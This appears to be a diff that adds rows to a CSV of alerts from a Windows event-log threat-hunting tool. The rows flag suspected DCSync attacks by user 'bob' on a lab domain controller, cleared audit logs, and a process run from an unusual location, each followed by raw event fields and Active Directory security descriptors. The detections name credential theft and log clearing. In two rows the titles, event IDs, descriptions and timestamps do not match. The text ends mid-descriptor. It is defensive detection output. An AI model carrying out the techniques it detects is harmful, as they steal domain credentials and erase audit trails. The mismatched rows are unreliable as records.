+ O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
+ %%14675
+
+",DC1.insecurebank.local,Security
+Audit log cleared,1639331872.272432,2021-12-12T21:57:52.272432+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 2982081
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+
+ S-1-5-21-308926384-506822093-3341789130-1106
+ a-jbrown
+ 3B
+ 0x364f7
+
+
+",01566s-win16-ir.threebeesco.com,Security
+Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
+
+
+
+
+ 5136
+ 0
+ 0
+ 14081
+ 0
+ 0x8020000000000000
+
+
+ 198242595
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ AF3067E0-BB6F-47C2-AA20-F3F458797F38
+ -
+ S-1-5-21-738609754-2819869699-4189121830-1108
+ bob
+ insecurebank
+ 0x40f2719
+ insecurebank.local
+ %%14676
+ DC=insecurebank,DC=local
+ C6FAF700-BFE4-452A-A766-424F84C29583
+ domainDNS
+ nTSecurityDescriptor
+ 2.5.5.15
+ O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
+ %%14674
+
+",DC1.insecurebank.local,Security
+Audit log cleared,1557594610.60807,2020-09-02T15:47:48.570502+04:00,,Audit,Critical,"User Name : ( IEUser ) with process : ( C:\Python27\python.exe ) run from Unusual location , check the number and date of execution in process execution report",4688,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 18196
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0x13765
+ 0x4f0
+ C:\Python27\python.exe
+ %%1938
+ 0x12c
+
+
+",01566s-win16-ir.threebeesco.com,Security
+Process running in Unusual location,1599047268.570502,2019-05-11T21:10:10.608070+04:00,,Threat,High,Audit log cleared by user ( a-jbrown ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 2171289
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+
+ S-1-5-21-308926384-506822093-3341789130-1106
+ a-jbrown
+ 3B
+ 0x38a14
+
+
+",IEWIN7,Security
+Dcsync Attack detected,1553549341.035686,2019-03-26T01:29:01.035686+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
+
+
+
+
+ 5136
+ 0
+ 0
+ 14081
+ 0
+ 0x8020000000000000
+
+
+ 198242605
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ 9F3DCF8F-49DF-4DB9-AA5F-09B804ADDD96
+ -
+ S-1-5-21-738609754-2819869699-4189121830-1108
+ bob
+ insecurebank
+ 0x40f2719
+ insecurebank.local
+ %%14676
+ DC=insecurebank,DC=local
+ C6FAF700-BFE4-452A-A766-424F84C29583
+ domainDNS
+ nTSecurityDescriptor
+ 2.5.5.15
+ O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
+ %%14674
+
+",DC1.insecurebank.local,Security
+Audit log cleared,1557594610.342445,2019-05-11T21:10:10.342445+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 18195
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0x1371b
+
+
+",IEWIN7,Security
+Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
+
+
+
+
+ 5136
+ 0
+ 0
+ 14081
+ 0
+ 0x8020000000000000
+
+
+ 198242604
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ 9F3DCF8F-49DF-4DB9-AA5F-09B804ADDD96
+ -
+ S-1-5-21-738609754-2819869699-4189121830-1108
+ bob
+ insecurebank
+ 0x40f2719
+ insecurebank.local
+ %%14676
+ DC=insecurebank,DC=local
+ C6FAF700-BFE4-452A-A766-424F84C29583
+ domainDNS
+ nTSecurityDescriptor
+ 2.5.5.15
+ O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
+ %%14675
+
+",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
+
+
+
+
+ 5136
+ 0
+ 0
+ 14081
+ 0
+ 0x8020000000000000
+
+
+ 198242603
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ 98E50F6A-AE61-4BFF-A9F0-CCFA5CCB555C
+ -
+ S-1-5-21-738609754-2819869699-4189121830-1108
+ bob
+ insecurebank
+ 0x40f2719
+ insecurebank.local
+ %%14676
+ DC=insecurebank,DC=local
+ C6FAF700-BFE4-452A-A766-424F84C29583
+ domainDNS
+ nTSecurityDescriptor
+ 2.5.5.15
+ O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;